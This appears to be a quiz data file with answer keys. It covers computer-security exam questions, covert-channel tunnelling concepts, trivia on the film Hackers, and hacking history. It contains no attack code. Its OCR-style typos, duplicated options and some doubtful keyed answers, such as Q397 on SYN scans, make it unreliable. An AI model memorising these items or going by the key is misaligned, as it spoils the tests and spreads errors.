A#Compsec Q327. Which security architecture utilizes authentication header and/or encapsulating security payload protocols? 	^A. IPSec (Internet Protocol Security). 	^B. SSL (Secure Sockets Layer). 	^C. TLS (Transport Layer Security). 	^D. PPTP (Point-to-Point Tunneling Protocol). 
B#Compsec Q328. Tunneling is best described as the act of encapsulating: 	^A. encrypted/secure IP packets inside of ordinary/non-secure IP packets. 	^B. ordinary/non-secure IP packets inside of encrypted/secure IP packets. 	^C. encrypted/secure IP packets inside of encrypted/non-secure IP packets. 	^D. ordinary/secure IP packets inside of ordinary/non-secure IP packets. 
B#Compsec Q329. What is a good practice in deploying a CA (Certificate Authority)? 	^A. enroll users for policy based certificates. 	^B. create a CPS (Certificate Practice Statement). 	^C. register the CA (Certificate Authority) with a subordinate CA (Certificate Authority). 	^D. create a mirror CA (Certificate Authority) for fault tolerance. 
B#Compsec Q330. What is the most common goal of operating system logging? 	^A. to determine the amount of time employees spend using various applications. 	^B. to keep a record of system usage. 	^C. to provide details of what systems have been compromised. 	^D. to provide details of which systems are interconnected. 
B#Compsec Q331. When a patch is released for a server the administrator should: 	^A. immediately download and install the patch. 	^B. test the patch on a non-production server then install the patch to production. 	^C. not install the patch unless there is a current need. 	^D. install the patch and then backup the production server. 
A#Compsec Q332. An attacker attempting to penetrate a companys network through its remote access system would most likely gain access through what method? 	^A. war dialer.	^B. Trojan horse. 	^C. DoS (Denial of Service). 	^D. worm. 
C#Compsec Q333. A companys web server is configured for the following services: HTTP (Hypertext Transfer Protocol), SSL (Secure Sockets Layer), FTP (Pile Transfer Protocol), SMTP (Simple Mail Transfer Protocol). ^  The web server is placed into a DMZ (Demilitarized Zone). What are the standard ports on the firewall that must be opened to allow traffic to and from the server? 	^A. 119,23,21,80. 	^B. 443, 119,21,1250. 	^C. 80,443,21,25. 	^D. 80,443, 110,21. 
C#Compsec Q334. Which of the following will let a security administrator allow only if HTTP (Hypertext Transfer Protocol) traffic for outbound Intemet connections and set permissions to allow only certain users to browse the web? 	^A. packet filtering firewall. 	^B. protocol analyzer. 	^C. proxy server. 	^D. stateful firewall. 
B#Compsec Q335. Which of the following IP (Internet Protocol) address schemes will require NAT (Network Address Translation) to connect to the Intemet?	^A. 204.180.0.0/24 	^B. 172.16.0.0/24 	^C. 192.172.0.0/24 	^D. 172.48.0.0/24 
A#Compsec Q336. What is the primary DISADVANTAGE of a third party relay? 	^A. Spammers can utilize the relay.	^B. The relay limits access to specific users.	^C. The relay restricts the types of e-mail that maybe sent. 	^D. The relay restricts spaminers from gaining access. 
B#Compsec Q337. A network administrator wants to connect a network to the Internet but does not want to compromise internal network IP (Internet Protocol) addresses. What should the network administrator implement? 	^A. a honey pot 	^B. a NAT (Network Address Translation)	^C. a VPN (Virtual Private Network) 	^D. a screened network 
A#Compsec Q338. Which of the following is NOT a field of a X.509 v.3 certificate? 	^A. private key	^B. issuer 	^C. serial number 	^D. subject
C#Compsec Q339. What is the default transport layer protocol and port number that SSL (Secure Sockets Layer) uses? 	^A. UDP (User Datagram Protocol) transport layer protocol and port 80	^B. TCP (Transmission Control Protocol) transport layer protocol and port 80	^C. TCP (Transmission Control Protocol) transport layer protocol and port 443	^D. UDP (User Datagram Protocol) transport layer protocol and port 69 
B#Compsec Q340. The greater the keyspace and complexity of a password, the longer a_______ attack may take to crack the password.	^A. dictionary 	^B. brute force 	^C. inference 	^D. frontal 
A#Compsec Q341. When a cryptographic systems keys are no longer needed, the keys should be:	^A. destroyed or stored in a secure manner	^B. deleted from the systems storage mechanism	^C. recycled	^D. submitted to a key repository 
B#Compsec Q342. Creation of an information inventory is most valuable when: 	^A. localizing license based attacks	^B. trying to reconstruct damaged systems	^C. determining virus penetration within an enterprise 	^D. terminating employees for security policy violations 
C#Compsec Q343. Which of the following is the best reason for a CA (Certificate Authority) to-revoke a certificate?	^A. The users certificate has been idle for two months.	^B. The user has relocated to another address. 	^C. The users private key has been compromised.	^D. The users public key has been compromised. 
A#Compsec Q344. Which of the following statements identifies a characteristic of a symmetric algorithm? 	^A. performs a fast transformation of data relative to other cryptographic methods	^B. regardless of the size of the users input data, the size of the output data is fixed. 	^C. is relatively slow in transforming data when compared to other cryptographic methods 	^D. includes a one way function where it is computationally infeasible for another entity to determine the input data from the output data 
A#Compsec Q345. Which of the following terms represents a MAC (Mandatory Access Control) model? 	^A. Lattice 	^B. Bell La-Padla 	^C. BIBA 	^D. Clark and Wilson 
B#Compsec Q346. The most common method of social engineering is:	^A. looking through users trash for information 	^B. calling users and asking for information 	^C. e-mailing users and asking for information 	^D. e-mail 
A#Compsec Q347. In the context of the Internet; what is tunneling? Tunneling is:	^A. using the Internet as part of a private secure network 	^B. the ability to burrow through three levels of firewalls	^C. the ability to pass information over the internet within the shortest amount of time 	^D. creating a tunnel which can capture data 
B#Compsec Q348. The term cold site refers to:	^A. a low temperature facility for long term storage of critical data 	^B. a location to begin operations during disaster recovery 	^C. a facility seldom used for high performance equipment 	^D. a location that is transparent to potential attackers 
D#Compsec Q349. Sensitive material is currently displayed on a users monitor. What is the best course of action for the user before leaving the area?	^A. The user should leave the are^A. The monitor is at a personal desk so there is no risk.	^B. turn off the monitor	^C. wait for the screen saver to start 	^D. refer to the company's policy on securing sensitive data 
A#Compsec Q350. The system administrator of the company has terminated employment unexpectedly. When the administrators user ID is deleted, the system suddenly begins deleting files. This is an example of what type of malicious code? 	^A. logic bomb 	^B. virus	^C. Trojan horse 	^D. worm 
A#Compsec Q351. With regards to the use of Instant Messaging, which of the following type of attack strategies is effectively combated with user awareness training? 	^A. social engineering	^B. stealth 	^C. ambush 	^D. multi-pronged 
A#Compsec Q352. A network administrator has just replaced a hub with a switch. ^  When using software to sniff packets from the networks, the administrator notices conversations the administrators computer is having with servers on the network, but can no longer see conversations taking place between other network clients and servers. ^  Given that the switch is functioning properly, what is the most likely cause of this? 	^A. With the exception of broadcasts, switches do not forward traffic out all port . 	^B. The switch is setup with a VLAN (Virtual Local Area Network) utilizing all ports.	^C. The software used to sniff packets is not configured properly.	^D. The sniffers ethernet card is malfunctioning. 
A#Compsec Q353. Which type of password generator is based on challenge-response mechanisms? 	^A. asynchronous	^B. synchronous 	^C. cryptographic keys 	^D. smart cards 
A#Compsec Q354. Which of the following is a characteristic of MAC (Mandatory Acces Control) systems? MACs (Mandatory Access Control): 	^A. uses levels of security to classify users and data	^B. allows owners of documents to determine who has access to specific documents 	^C. uses access control lists which specify a list of authorized users 	^D. uses access control lists which specify a list of unauthorized users 
C#Compsec Q355. Companies without an acceptable use policy (AUP) may give their employees an expectation of: 	^A. intrusions 	^B. audits 	^C. privacy 	^D. prosecution 
A#Compsec Q356. It is most difficult to eavesdrop on which of the following types of network cabling? 	^A. fiber optic cable	^B. coaxial cable 	^C. UTP (DNShielded Twisted Pair) 	^D. STP (Shielded Twisted Pair) 
C#Compsec Q357. Implementation of access control devices and technologies must fully reflect an organizations security position as contained in its: 	^A. ACLs (Access Control List) 	^B. access control matrixes	^C. information security policies	^D. internal control procedures 
D#Compsec Q358. Which of the following are tunneling protocols?	^A. IPSec (Internet Protocol Security), L2TP (Layer Two Tunneling Protocol), and SSL (Secure Sockets Layer) 	^B. IPSec (Internet Protocol Security), L2TP (Layer Two Tunneling Protocol), and PPP (Point-to-Point Protocol) 	^C. L2TP (Layer Two Tunneling Protocol), PPTP (Point-to-Point Tunneling Protocol), and SSL (Secure Sockets Layer)	^D. PPTP (Point-to-Point Tunneling Protocol), L2TP (Layer Two Tunneling Protocol), and IPSec (Internet Protocol Security) 
B#Compsec Q359. What are TCP (Transmission Control Protocol) wrappers used for? 	^A. preventing IP (Internet Protocol) spoofing 	^B. controlling access to selected services	^C. encrypting TCP (Transmission Control Protocol) traffic 	^D. sniffing TCP (Transmission Control Protocol) traffic to troubleshoot 
C#Compsec Q360. Loki, NetCaZ, Masters Paradise and NetBus are all considered what type of attack? 	^A. brute force 	^B. spoofing 	^C. back door 	^D. man in the middle 
A#Compsec Q361. Which protocol is used to negotiate and provide authenticated keying material for-security associations in a protected manner? 	^A. ISAKMP (Internet Security Association and Key Management Protocol)	^B. ESP Incapsulating Security Payload) 	^C. SSH (Secure Shell) 	^D. SKEME (Secure Key Exchange Mechaniam)
D#Compsec Q362. An administrator wants to set up a system for an internal network that will examine all packets for known attack signatures. What type of system will be set up? 	^A. vulnerability scanner 	^B. packet filter 	^C. host based IDS (Intrusion Detection System)	^D. network based IDS (Intrusion Detection System) 
A#Compsec Q363. A password management system designed to provide availability for a large number of users includes which of the following? 	^A. self service password resets 	^B. locally saved passwords 	^C. multiple access methods 	^D. synchronized passwords 
A#Compsec Q364. Turnstiles, double entry doors and security guards are all prevention measures for what type of social enginering? 	^A. piggybacking 	^B. looking over a co-workers shoulder to retrieve information 	^C. looking through a co-workers trash to retrieve information 	^D. impersonation 
B#Compsec Q365. What is the major reason that social engineering attacks succeed? 	^A. strong passwords are not required 	^B. lack of security awareness 	^C. multiple logins are allowed 	^D. audit logs are not monitored frequently 
D#Compsec Q366. Which authentication protocol should be employed to encrypt passwords? 	^A. PPTP (Point-to-Point Tunneling Protocol) 	^B. SMTP (Simple Mail Transfer Protocol) 	^C. Kerberos 	^D. CHAP (Challenge Handshake Authentication Protocol) 
C#Compsec Q367. NAT (Network Address Translation) can be accomplished with which of the following? 	^A. static and dynamic NAT (Network Address Translation) and PAT (Port Address Translation)	^B. static and hide NAT (Network Address Translation)	^C. static and hide NAT (Network Address Translation) and PAT (Port Address Translation)^D. static, hide, and dynamic NAT (Network Address Translation) 
B#Compsec Q368. In order for an SSL (Secure Sockets Layer) connection to be established between a web client and server automatically, the web client and server should have a(n): ^A. shared password ^B. certificate signed by a trusted root CA (Certificate Authority)^C. address on the same subnet ^D. common operating system 
D#Compsec Q369. A mobile sales force requires remote connectivity in order to access shared files and e-mail on the corporate network. ^  All employees in the sales department have laptops equipped with ethemet adapters. Some also have modems. What is the best remote access solution to allow all sales employees to access the corporate network? 	^A. ISDN (Integrated Services Digital Network) 	^B. dial-up 	^C. SSL (Secure Sockets Layer) 	^D. VPN (Virtual Private Network) 
A#Compsec Q370. Which of the following four critical functions of a VPN (Virtual Private Network) restricts users from using resources in a corporate network?	^A. access control 	^B. authentication 	^C. confidentiality 	^D. data integrity 
A#Compsec Q371. Of the following, what is the primary attribute associated with e-mail hoaxes? 	^A. E-mail hoaxes create unnecessary e-mail traffic and panic in non-technical users.	^B. E-mail hoaxes take up large amounts of server disk space. 	^C. E-mail hoaxes can cause buflin overflows on the e-mail server. 	^D. E-mail hoaxes can encourage malicious users. 
D#Compsec Q372. Most certificates used for authentication are based on what standard? 	^A. ISO 19278	^B. X.500 	^C. RFC 1205 	^D. X.509 v3 
A#Compsec Q373. In order for User A to send User B an e-mail message that only User B can read, User A must encrypt the e-mail with which of the following keys? 	^A. User Bs public key 	^B. User Bs private key 	^C. User As public key 	^D. User As private key 
C#Compsec Q374. What does the message recipient use with the hash value to verify a digital signature? 	^A. signers private key 	^B. receivers private key 	^C. signers public key 	^D. receivers public key 
A#Compsec Q375. While surfing the Internet a user encounters a pop-up window that prompts the user to download a browser plug-in. ^  The pop-up window is a certificate which validates the identity of the plug-in developer. Which of the following best describes this type of certificate? 	^A. software publisher certificate 	^B. web certificate 	^C. CA (Certificate Authority) certificate 	^D. server certificate 
C#Compsec Q376. The public key infrastructure model where certificates are issued and revoked via a CA (Certificate Authority) is what type of model? 	^A. managed 	^B. distributed 	^C. centralized	^D. standard 
B#Compsec Q377. Company intranets, newsletters, posters, login banners and e-mails would be good tools to utilize in a security: 	^A. investigation 	^B. awareness program 	^C. policy review 	^D. control test 
B#Compsec Q378. What is a network administrator protecting against by ingress/egress filtering traffic as follows:^  Any packet coming into the network must not have a source address of the internal network. ^  Any packet coming into the network must have a destination address from the internal netwoii ^  Any packet leaving the network must have a source address from the internal network. ^  Any packet leaving the network must not have a destination address from the internal networks ^  Any packet coming into the network or leaving the network must not have a source or destination address of a private address or an address listed in RFC19lS reserved space.	^A. SYN (Synchronize) flooding 	^B. spoofing 	^C. DoS (Denial of Service) attacks 	^D. dictionary attacks 
A#Compsec Q379. When hosting a web server with CGI (Common Gateway Interface) scripts, the directories for public view should have:	^A. execute permissions 	^B. read and write permissions 	^C. read, write, and execute permissions 	^D. full control permissions 
A#Compsec Q380. When UserA applies to the CA (Certificate Authority) requesting a certificate to allow the start of communication with User B, User A must supply the CA (Certificate Authority) with	^A. User As public key only 	^B. User Bs public key only 	^C. User As and User Bs public keys 	^D. User As and User Bs public and private keys 
B#Compsec Q381. Which of the following most accurately describes a DMZ (Demilitarized Zone)?	^A. an application program with a state that authenticates the user and allows the user to be categorized based on privilege 	^B. a network between a protected network and an external network in order to provide an additional layer of security 	^C. the entire area between the network of origin and the destination network	^D. an application that allows the user to remove any offensive of an attacker 
A#Compsec Q382. A protocol specified in IEEE (Institute of Electrical and Electronics Engineers) 802.11b intended to provde a WLAN (Wireless Local AreaNetwork) with the level of security associated a WAN ( Wireless Local-Area Network) is: 	^A. WEP (Wired Equivalent Privacy) 	^B. ISSE (Information Systems Security Engineering) 	^C. ISDN (tntegrated Services Digital Network) 	^D. VPN (Virtual Private Network) 
A#Compsec Q383. SSL (Secure Sockets Layer) operates between which two layers of the OSI (Open Systems Interconnection) model? 	^A. application and transport 	^B. transport and network 	^C. network and data link 	^D. data link and physical 
B#Compsec Q385. What are the three entities of the SQL (Structured Query Language) security model? 	^A. actions, objects and tables 	^B. actions, objects and users 	^C. tables, objects and users 	^D. users, actions and tables 
A#Compsec Q386. Which is of greatest importance when considering physical security? 	^A. reduce overall opportunity for an intrusion to occur 	^B. make alarm identification easy for security professionals 	^C. barricade all entry points against unauthorized entry 	^D. assess the impact of crime zoning and environmental considerations in the overall design 
A#Compsec Q387. The flow of packets traveling through routers can be controlled by implementing what type of security mechanism? 	^A. ACLs (Access Control List) 	^B. fault tolerance tables 	^C. OSPF (Open Shortest Path First) policy 	^D. packet locks 
A#Compsec Q388. Clients in Company A can view web sites that have been created for them, but CAN NOT navigate in them. Why might the clients not be able to navigate in the sites? 	^A. The sites have improper permissions assigned to them. 	^B. The server is in a DMZ (Demilitarized Zone). 	^C. The sites have IP (Internet Protocol) filtering enabled. 	^D. The server has heavy traffi^C. 
A#Compsec Q389. The goal of TCP (Transmission Control Protocol) hijacking is: 	^A. taking over a legitimate TCP (Transmission Control Protocol) connection 	^B. predicting the TCP (Transmission Control Protocol) sequence number 	^C. identifying the TCP (Transmission Control Protocol) port for future exploitation 	^D. identifying source addresses for malicious use 
D#Compsec Q390. TCP/IP (Transmission Control Protocol/Internet Protocol) hijacking resulted from exploitation of the fact that TCP/IP (Transmission Control Protocol/Internet Protocol): 	^A. has no authentication mechanism, thus allowing a cleartext password of 16 bytes 	^B. allows packets to be tunneled to an alternate network 	^C. has no authentication mechanism, and therefore allows connectionless packets from anyone	^D. allows a packet to be spoofed and inserted into a stream, thereby enabling commands to be executed on the remote host 
D#Compsec Q391. Intruders are detected accessing an internal network. The source IP (Internet Protocol) addresses originate from trusted networks. The most comomon type of attack in this scenario is:	^A. social engineering	^B. TCP/IP hijacking 	^C. smurfing 	^D. spoofing 
C#Compsec Q392. Which of the following is used to authenticate and encrypt IP (Internet Protocol) traffic? 	^A. ESP (Encapsulating Security Payload) 	^B. S/MIME (Secure Multipurpose Internet Mail Extensions) 	^C. IPSec (Internet Protocol Security) 	^D. IPv2 (Internet Protocol version 2) 
B#Compsec Q393. An administrator is configuring a server to make it less susceptible to an attacker obtaining the user account passwords. ^  The administrator decides to have the encrypted passwords contained within a file that is readable only by root. What is a common name for this file? 	^A. passwd 	^B. shadow 	^C. hosts.allow 	^D. hosts.deny 
A#Compsec Q394. Which of the following is the best IDS (Intrusion Detection System) to monitor the-entire network? 	^A. a network based IDS (Intrusion Detection System) 	^B. a host based IDS (Intrusion Detection System) 	^C. a user based IDS (Intrusion Detection System) 	^D. a client based IDS (Intrusion Detection System) 
A#Compsec Q395. One of the primary concerns of a centralized key management system is that?	^A. keys must be stored and distributed securely 	^B. certificates must be made readily available 	^C. the key repository must be publicly accessible 	^D. the certificate contents must be kept confidential 
B#Compsec Q396. What standard security protocol provides security and privacy in a WLAN (Wireless Local Area Network)? 	^A. SWP (Secure WLAN Protocol) 	^B. WEP (Wired Equivalent Privacy) 	^C. SSL (Secure Sockets Layer) 	^D. S/MIME (Secure Multipurpose Internet Mail Extensions) 
A#Compsec Q397. What port scanning technique is used to see what ports are in a listening state and then performs a two way handshake? 	^A. TCP (transmission Control Protocol) SYN (Synchronize) scan 	^B. TCP (transmission Control Protocol) connect scan 	^C. TCP (transmission Control Protocol) fin scan 	^D. TCP (transmission Control Protocol) null scan 
B#Compsec Q398. Performing a security vulnerability assessment on systems that a company relies on demonstrates: 	^A. that the site CAN NOT be hacked 	^B. a commitment to protecting data and customers	^C. insecurity on the part of the organization 	^D. a needless fear of attack 
B#Compsec Q399. The best reason to perform a business impact analysis as part of the business continuity planning process is to: 	^A. test the veracity of data obtained from risk analysis 	^B. obtain formal agreement on maximum tolerable downtime 	^C. create the framework for desiguing tests to determine efficiency of business continuity plans	^D. satisfy documentation requirements of insurance companies covering risks of systems and data important for business continuity
D#Compsec Q400. A FTP (File Transfer Protocol) bounce attack is generally used to:	^A. exploit a buffer overflow vulnerability on the FTP (File Transfer Protocol) server 	^B. reboot the FTP (File Transfer Protocol) server 	^C. store and distribute malicious code	^D. establish a connection between the FTP (File Transfer Protocol) server and another computer
A#Compsec Q401. E-mail servers have a configuration choice which allows the relaying of messages from one e-mail server to another. An e-mail server should be configured to prevent e-mail relay because:	^A. untraceable, unwanted e-mail can be sent	^B. an attacker can gain access and take over the server 	^C. confidential information in the servers e-mail boxes can be read using the relay 	^D. the open relay can be used to gain control of nodes on additional networks 
B#Compsec Q402. A security designer is planning the implementation of security mechanisms in a RBAC (Role Based Access Control) compliant system. The designer has determined that there are three types of resources in the system inclading files, printers, and mailboxes. The organization has four distinct departments with distinct functions including Sales, Marketing, Management, and Production. Each department needs access to different resources. Each user has a workstation. Which roles should be created to support the REAC (Role Based Access Control) model?	^A. file, printer, and mailbox roles	^B. sales, marketing, management, and production roles 	^C. user and workstation roles	^D. allow access and deny access roles 
A#Compsec Q404. One characteristic of biometrics is: 	^A. it does not require a password	^B. it is 100% effective	^C. false positives are rare 	^D. false negatives are rare
C#Compsec Q405. As a security administrator, what are the three categories of active responses relating to intrusion detection? 	^A. collect additional information, maintain the environment, and take action against the intruder 	^B. collect additional information, maintain the environment, and take action against the intruder 	^C. collect additional information, change the environment, and take action against the intruder 	^D. discard any additional information, change the environment, and take action against the intruder 
A#Compsec Q406. Intrusion detection systems typically consist of two parts, a console and a:	^A. sensor	^B. router	^C. processor	^D. firewall 
B#Compsec Q407. The owner of a file modifies the security settings of that file on the servers to limit access to specific individuals. Which method of security is being applied?	^A. MAC (Mandatory Access Control)	^B. DAC (Discretionary Acess Control)	^C. SAC (Subject Access Control)	^D. RBAC (Role Based Access Control)
C#Compsec Q408. A block cipher is an example of which of the following encryption algorithms?	^A. asymmetric key	^B. public key	^C. symmetric key	^D. unkeyed
C#Compsec Q409. There are a number of ports in TCP/IP that can be scanned, exploited or attacked. How many ports are vunerable to such operations?	^A. 32	^B. 1,024	^C. 65,535	^D. 16,777,216
B#Compsec Q410. Which of the following makes a token based authentication system very diffult to attack?	^A. a token uses a digital certificates	^B. a token is something that is physically possessed	^C. a token can only be used once	^D. a token can only be used by the intended owner.
C#Compsec Q411. The main purpose of digital certificates is to securely bind a:	^A. public key to the identity of the signer and recipient	^B. private key to the identity of the signer and recipient	^C. public key to the entity that holds the corresponding private key	^D. private key to the entity that holds the corresponding public key 
B#Compsec Q412. Which of the following is an asymmetric cryptographic algorithm?	^A. AES	^B. EIGamal	^C. IDEA	^D. DES
Covert Channels# CC Q1: To hide the data and the fact that youre communicating is the use of?
Encryption#CC Q2: what can be used to scramble data in an Covert Channel?
Legitimate#CC Q3: Actual data transfer in a covert channel should appear as _____ to the casual eye.
innocuous#CC Q4: Actual data transfer in a covert channel should appear as _____ to the casual eye.
A#CC Q5: Any communication channel can be exploited by a process to transfer information in a manner that violates the systems security policy. ^A: True ^B: False
a,b,c,d# CC Q6: A covert channel can be use to: ^A: Download tools from the outside	^B: Upload internal data to the outside	^C: Create virtual network to the outside machine ^D: communicate to the outside party ^E: it has no obvious use
file-based steganography#CC Q7: a type of covert channel ___-____ ________
network packet steganography#CC Q8: a network type of covert channel ______ _______ _________
Protocol encapsulation# CC Q9: a type of covert channel _______ __________
tcp over ssl#CC Q10: a typical use of a covert channel ___ over ___
tcp over ssh#CC Q11: a typical use of a covert channel ___ over ___
application-layer tunneling#CC Q12: a type of covert channel _________-_____ ________
tcp over https#CC Q13: a typical of application-layer tunneling is:
tcp over DNS#CC Q14: a typical of application-layer tunneling is:
tcp over ICMP#CC Q15: a typical of application-layer tunneling is:
File-Base Steganograpy#CC Q16: for hiding messages in an image and other files u can use: 
packet header#CC Q17: In network packet steganography, covert data may be in the: 
Initial Sequence Number#CC Q18: ISN, often misused in covert channels stands for: 
random#CC Q19: ISN's should be:
ICMP ECHO REQUEST and ICMP ECHO REPLY#CC Q20: ICMP tunneling, what are the best candidates to look for?
SSL Wrappers#CC Q21: a protocol built to encapsulate or pickyback other data:
HTTPS#CC Q22: a protocol built to encapsulate or pickyback other data:
SMTPS#CC Q23: a protocol built to encapsulate or pickyback other data:
POP3S#CC Q24: a protocol built to encapsulate or pickyback other data:
Connect#CC Q25 Https uses SSL for encryption, to prevent HTTP tunneling u can blocl the ______ method.
HTTP POST#CC Q26: Data can be sent as: ______ data. Clients will connect priodically with NOP (not operational)
NSTX#CC Q27: With ___ u can create IP over DNS
Crash Override and Zero Cool#Hackers The Movie Q1: What are Dade Murphy's two hacker aliases? 
D#HTM Q2:  What question did Dade's mother ask him near the beginning of the movie, whilst he was in the shower?	^A: Hack any good sites last night?	^B: Were you on the computer all night?	^C: Did you forget to wash behind your ears?	^D:You hooked it up to the phone again didn't you?
1507#HTM Q3: How many computer systems was Dade responsible for crashing when he was 12 years old? 
Razor and Blade#HTM Q4: What are the names of the two elite hackers that Dade and Kate go to for help? 
Marc Anthony#HTM Q5: What Latino singer plays an FBI agent in the movie? 
triple#HTM Q6: How many times faster than the Pentium, does Kate say her new computer's speed is? 
B#HTM Q7: What song is playing as Dade, The Freak and Serial Killer enter Kate's party?	^A:Voodoo People, The Prodigy	^B:Connected, The Stereo MC's	^C:Hey Boy, Hey Girl, The Chemical Brothers	^D:Teardrop, Massive Attack
B#HTM Q8: Who did Eugene Belford disguise himself as, when hacking into the FBI website to change Dade's mother's criminal record?^A:NYPD Officer	^B:Alabama State Trooper	^C:FBI Agent	^D:CIA Agent
B#HTM Q9: What soft drink do Razor and Blade claim is the soft drink of the elite hacker?	^A:Coca Cola	^B:Jolt Cola	^C:Pepsi Cola	^D:7 Up
D#HTM Q10: What is the name of the virus that the hackers were being blamed for infecting the Gibson with?	^A: Melissa	^B: Rabbit	^C: Cookie Monster	^D: Da Vinci
homocidal#HTM Q11: Finish this quote: "What's your interest in Kate Libby? Academic? Purely sexual? ________. (One Word. Dade's response to the question.)" 
A#HTM Q12: Who said: Well, it looks like I'm on top?	^A: Crash Override	^B: Phantom Phreak	^C: Acid Burn	^D: Cereal Killer
A#HTM Q13: Who does Phantom Phreak call: Boy Meets World?	^A: Joey	^B: Cereal Killer	^C: Dade	^D: Himself
A#HTM Q14: What does Dade say to Kate when the sprinklers go off in the school?	^A: Pool on the roof must have a leak.	^B: Mess with the best, die like the rest.	^C: Looks like it rained on your parade.	^D: Looks like you're all wet.
C#HTM Q15: Who says, "Spandex: it's a privilege, not a right"?	^A: The Plague	^B: Crash Override	^C: Cereal Killer	^D: Phantom Phreak
B#HTM Q16: Who says, "Never fear, I is here"? ^A: Crash Override	^B: The Plague	^C: Cereal Killer	^D: Joey
D#HTM Q17: "His parents missed Woodstock and he's been making up for it ever since." Who said this?	^A: Cereal Killer	^B: Crash Override	^C: Acid Burn	^D: Phantom Phreak
Mess with the best, die like the rest#HTM Q18: What is Crash Override's catchphrase? 
froot loops#HTM Q19: Finish this quote: "Meet Cereal Killer. As in ____." 
Lord Nikon#HTM Q20: Who is referred to as "Polaroid Head"? 
Jonny Lee Miller#HTM Q21: Which actor portrays Dade Murphey (Crash Override)? 
Angelina Jolie#HTM Q22: Which actress portrays Kate Libby (Acid Burn)? 
B#HTM Q23: Dade was arrested when he was eleven years old. Where and when did it happen?	^A: Los Angeles, 1988	^B: Seattle, 1988	^C: Boston, 1985	^D: Los Angeles, 1985
A#HTM Q24: How many separate systems did Dade (as Zero Cool) cause to crash in one day leading to his arrest?	^A: 1507	^B: 1205	^C: 502	^D: 1000
B#HTM Q25: When Dade is allowed to use a computer again on his 18th birthday, he takes over a television station. What show does he play?	^A: The X-Files	^B: The Outer Limits	^C: The Twilight Zone	^D: Alfred Hitchcock Presents
C#HTM Q26: According to the movie, what are the four most commonly used passwords?	^A: money, love sex, secret	^B: secret, peace, love, god	^C: love, secret, sex, god	^D: love, peace, secret, sex
A#HTM Q27: The file Joey copied was a 'garbage-named' file?	^A: True	^B: False
A#HTM Q28: How is Dade persuaded to return his copy of the disk?	^A: his mother's safety is threatened	^B: he never returned a copy of the disk	^C: he is bribed with cash	^D: he is offered a car
D#HTM Q29: The Hackers follow a show featuring 'Razor and Blade'. What is it called?	^A: Hackers Of The World	^B: Hacking With Razor and Blade	^C: Compute This	^D: Hack The Planet
rollerblades#HTM Q30: What do the hackers use to go from one place to the next? 
B#HTM Q31: As the movie ends, Dade and Kate are on their first date. Where do we last see them?	^A: video arcade	^B: rooftop swimmingpool	^C: rollercoaster	^D: dancing in a club
D#HTM Q32: What is the real-life connection between co-stars Angelina Jolie and Jonny Lee Miller?	^A: hey went to the same grade school	^B: Both were trained in ballet	^C: they both had a dog named Buddy as a child	^D: After filming Hackers, they got married
8BBS#History Q1: What was one of the first underground message boards?
A#History Q2: Why seized the police in 1982 the entire board of 8BBS, the stronghold of the West Coast phone-phreak elite?	^A: A friendly 8BBS alumnus passed the sysop a new modem which had been purchased by credit-card fraud.	^B: Microsoft put out an reward so a rival group betrayed them.	^C: They comprimised an high secure goverment system.	^D: The system was used by Lex Luthor for breaking computer security
Legion of Doom#History Q3: Name a group sprung up in 1984
Lex Luthor#History Q4: Who was at the helm of Legion of Doom?
Phone Phreak#History Q5: Someone who "hacks" the telephone system is called a?
Kevin Poulsen#History Q6: AKA Dark Dante, What is his real name?
Porsche#History Q7: In one of his more creative exploits, A phone quiz,  Kevin Poulsen won a:
Berkeley Blue and Oak Toebark#History Q8: Name two members of Californias Homebrew Computer Club
Steve Jobs#History Q9: Whats the real name of Californias Homebrew Computer Club member: Berkeley Blue?
Steve Wozniak#History Q10: Whats the real name of Californias Homebrew Computer Club member: Oak Toebark and later went on to found Apple Computer?
Michelangelo#History Q11: In 1992 up to one quarter of American hard drives would be completely erased, accordingly to the media. What virus was held responsible?
C#History Q12: What did Robert Morris wrote in 1988?	^A: A Virus	^B: A Trojan	^C: A Worm	^D: A Hoax
D#History Q13: What started a nation wide crackdown on hackers on the January 18, 1990?	^A: phone phreaks found ways to manipulate an AT&T phone system causing blocking of long-distance calls 	^B: A Internet Worm replicated so many times and sucked up so many CPU cycles, bringing the Internet to its knees.	^C: A virus infected the national powergrid and caused a black out.	^D: The information security of AT&Ts nationwide network was shut down for almost nine hours due to an internal bug.
A whistle#History Q14: What did John Draper, (Phone Phreak) use to make  free long-distance calls?
Captain Crunch#History Q15: What is the handle of John Draper, a Phone Phreaker?
B#History Q16: Where did Captain Crunch found his whistle to *Phreak the Phone*?	^A: In a toystore	^B: In a box of childrens cereal	^C: In a musicstore for classical musicians	^D: I really dont have a clue....
War Games#History Q17: Some of the most notorious hackers cite this movie as their original inspiration:
25#History Q18: At the age of ??, Kevin Mitnick compromised the internet security and email security of MCI and Digital Equipment 
a moth#History Q19: What found Rear Admiral Grace Murray Hopper trapped between relays in a Navy computer, now known as: a bug?
John von Neumann#History Q20: Who devised the theory of self-replicating programs providing the theoretical foundation for computers that hold information in their "memory."? 
1960#History Q21: When did AT&T introduces its Dataphone, the first commercial modem. 
American Standard Code for Information Interchange#History Q22: What does ASCII stand for? 
1969#History Q23: In what year they launched ARPANET, an early network used by government research groups and universities
A Virus#History Q24: Whats a computer program called that can "affect other computer programs by modifying them in such a way as to include a (possibly evolved) copy of itself. 
Cyberspace#History Q25: In his novel, "Neuromancer," author William Gibson popularizes the term "___________," a word he used to describe the network of computers through which the characters in his futuristic novels travel. 
Pakistan#History Q26 1986: One of the first PC viruses ever created, "The Brain," is released by programmers in ____________ 
1979#History Q27: What year? Engineers at Xerox Palo Alto Research Center discover the computer "worm," a short program that scours a network for idle processors
PGP#History Q28: 1991:The U.S. government begins a three-year criminal investigation on Philip Zimmerman. What caused it?
Good Times#History Q29: Which phrase demonstrated the self-replicating power of e-mail virus hoaxes that continue to circulate in different forms today
A#History Q30: 1995 Microsoft Corp. releases Windows 95. Anti-virus companies worry that the operating system will be:	^A: resistant to viruses	^B: vunerable to viruses	^C: already infected with a virus	^D: not able to remove a virus
Solar Sunrise#History Q31 1998: Intruders infiltrate and take control of more than 500 military, government and private sector computer systems. Whats the event called?
B#History Q32 1998: Intruders infiltrate and take control of more than 500 military, government and private sector computer systems. Who were behind this?	^A: Hackers from Iraq	^B: Two californian teenagers	^C: A student from the Philippines	^D: Melissa virus author David L. Smith
Melissa#History Q33: This virus sends copies of itself to the first 50 names listed in the recipient's Outlook e-mail address book and mails also infects Microsoft Word documents sending them to the same 50 recipients
